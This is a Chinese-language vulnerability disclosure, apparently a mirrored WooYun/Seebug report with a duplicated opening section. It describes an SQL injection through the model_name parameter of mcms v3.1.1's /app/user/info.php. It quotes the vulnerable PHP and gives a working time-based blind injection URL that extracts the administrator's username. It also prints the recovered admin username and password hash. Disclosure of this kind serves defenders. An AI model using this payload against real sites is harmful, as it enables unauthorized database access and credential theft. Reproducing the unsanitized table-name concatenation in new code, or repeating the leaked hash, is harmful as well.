VULHUB ™

### 简要描述： mcms最新版任意表的任意字段SQL注入漏洞 ### 详细说明： 前两天在wooyun提了两个漏洞，一天就确认修复了，而且出了新版本，那我就去官网下个最新（v_3.1.1.enterprise）的来学习学习。 注入一枚：GET /app/user/info.php?m=change_model&ajax=1&info_id=1&model_name=product GET中有个参数model_name，这个参数是用来与数据表前缀（TB_PRE）拼接需要操作的数据表的表名的，在获得model_name时并没有过滤，因此，在数据表名可就可以进行注入了，当然，可以利用任意表的任意字段来进行注入。 看看代码/app/user/info.php ``` //切换模型的表单HTML function m__change_model(){ global $dbm,$C; $model_name=isset($_GET['model_name'])?$_GET['model_name']:''; $info_id=isset($_GET['info_id'])?intval($_GET['info_id']):0;//print_r($model_name); $model_fields=array(); if($info_id>0) { $sql="select * from ".TB_PRE.$model_name." where info_id='$info_id' limit 1"; $rs=$dbm->query($sql); if(count($rs['list'])==1) $model_fields=$rs['list'][0]; } if($model_name!='') die($C->show_model_form($model_name,$model_fields)); die(''); } ``` $model_name直接通过GET获取，没有经过过滤处理，也没有进行表的属性判断就与表前缀进行了拼接，因此，这里可以实现任意表的任意字段注入。 Payload:GET提交 ```...

### 简要描述： mcms最新版任意表的任意字段SQL注入漏洞 ### 详细说明： 前两天在wooyun提了两个漏洞，一天就确认修复了，而且出了新版本，那我就去官网下个最新（v_3.1.1.enterprise）的来学习学习。 注入一枚：GET /app/user/info.php?m=change_model&ajax=1&info_id=1&model_name=product GET中有个参数model_name，这个参数是用来与数据表前缀（TB_PRE）拼接需要操作的数据表的表名的，在获得model_name时并没有过滤，因此，在数据表名可就可以进行注入了，当然，可以利用任意表的任意字段来进行注入。 看看代码/app/user/info.php ``` //切换模型的表单HTML function m__change_model(){ global $dbm,$C; $model_name=isset($_GET['model_name'])?$_GET['model_name']:''; $info_id=isset($_GET['info_id'])?intval($_GET['info_id']):0;//print_r($model_name); $model_fields=array(); if($info_id>0) { $sql="select * from ".TB_PRE.$model_name." where info_id='$info_id' limit 1"; $rs=$dbm->query($sql); if(count($rs['list'])==1) $model_fields=$rs['list'][0]; } if($model_name!='') die($C->show_model_form($model_name,$model_fields)); die(''); } ``` $model_name直接通过GET获取，没有经过过滤处理，也没有进行表的属性判断就与表前缀进行了拼接，因此，这里可以实现任意表的任意字段注入。 Payload:GET提交 ``` /app/user/info.php?m=change_model&ajax=1&info_id=1&model_name=product/**/where/**/info_id=-1/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23 ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟2s。如下图 [<img src="https://images.seebug.org/upload/201502/26215056cf779a9da79a93b0a15a30ef217b825b.jpg" alt="猜测错误副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/26215056cf779a9da79a93b0a15a30ef217b825b.jpg) 若正确，则延迟5s（视环境而定，可自行缩短延迟时间），如下图 [<img src="https://images.seebug.org/upload/201502/262151111d5f0a5c8b13ff56538863dfb6e3f49e.jpg" alt="猜测成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/262151111d5f0a5c8b13ff56538863dfb6e3f49e.jpg) 按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：mcmsadmin，密码为： 891c796e40d55cabc96051ca971c1894 ### 漏洞证明： 见 详细说明